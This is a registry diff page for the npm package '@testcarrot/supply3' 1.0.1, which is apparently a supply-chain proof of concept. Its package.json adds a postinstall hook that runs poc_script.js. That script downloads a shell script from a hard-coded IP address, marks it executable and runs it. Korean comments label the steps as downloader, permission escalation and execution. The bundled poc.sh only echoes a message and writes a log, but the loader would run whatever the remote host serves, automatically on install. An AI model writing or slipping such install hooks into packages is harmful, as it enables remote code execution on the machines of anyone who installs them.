@testcarrot/supply3 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/package.json +13 -0
  2. package/poc.sh +7 -0
  3. package/poc_script.js +44 -0
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "@testcarrot/supply3",
3
+ "version": "1.0.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "postinstall": "node poc_script.js"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
13
+ }
package/poc.sh ADDED
@@ -0,0 +1,7 @@
1
+ #!/bin/bash
2
+
3
+ # 이 스크립트가 실행되었음을 터미널에 알림
4
+ echo "[+] POC Shell Script: Successfully downloaded and executed."
5
+
6
+ # 실행되었다는 로그 파일을 남김
7
+ echo "This file was created by the downloaded poc.sh at $(date)" > poc_shell_executed.log
package/poc_script.js ADDED
@@ -0,0 +1,44 @@
1
+ const fs = require('fs');
2
+ const http = require('http');
3
+ const { exec } = require('child_process');
4
+
5
+ console.log('[+] Advanced POC Script (Loader): Script triggered.');
6
+
7
+ const scriptUrl = 'http://10.129.66.175:8000/poc.sh';
8
+ const downloadedScriptPath = 'downloaded_payload.sh';
9
+
10
+ // 1. 외부 스크립트 다운로드 (Downloader)
11
+ const file = fs.createWriteStream(downloadedScriptPath);
12
+ http.get(scriptUrl, (response) => {
13
+ response.pipe(file);
14
+
15
+ file.on('finish', () => {
16
+ file.close();
17
+ console.log('[+] POC Action: Payload script downloaded successfully.');
18
+
19
+ try {
20
+ // 2. 스크립트에 실행 권한 부여 (Permission Escalation)
21
+ // UNIX 계열 시스템(Linux, macOS)에서 필수적인 단계
22
+ fs.chmodSync(downloadedScriptPath, '755');
23
+ console.log('[+] POC Action: Made the downloaded script executable.');
24
+
25
+ // 3. 다운로드한 스크립트 실행 (Execution)
26
+ console.log('[+] POC Action: Executing the downloaded payload...');
27
+ exec(`sh ./${downloadedScriptPath}`, (error, stdout, stderr) => {
28
+ if (error) {
29
+ console.error(`[-] POC Error: Failed to execute script. Error: ${error.message}`);
30
+ return;
31
+ }
32
+ // poc.sh 에서 출력한 메시지를 보여줌
33
+ console.log(`[+] POC Success: Script output:\n${stdout}`);
34
+ if (stderr) {
35
+ console.error(`[!] POC stderr: ${stderr}`);
36
+ }
37
+ });
38
+ } catch (err) {
39
+ console.error(`[-] POC Error during chmod/exec: ${err.message}`);
40
+ }
41
+ });
42
+ }).on('error', (err) => {
43
+ console.error(`[-] POC Error: Failed to download script. Is the local server running? Error: ${err.message}`);
44
+ });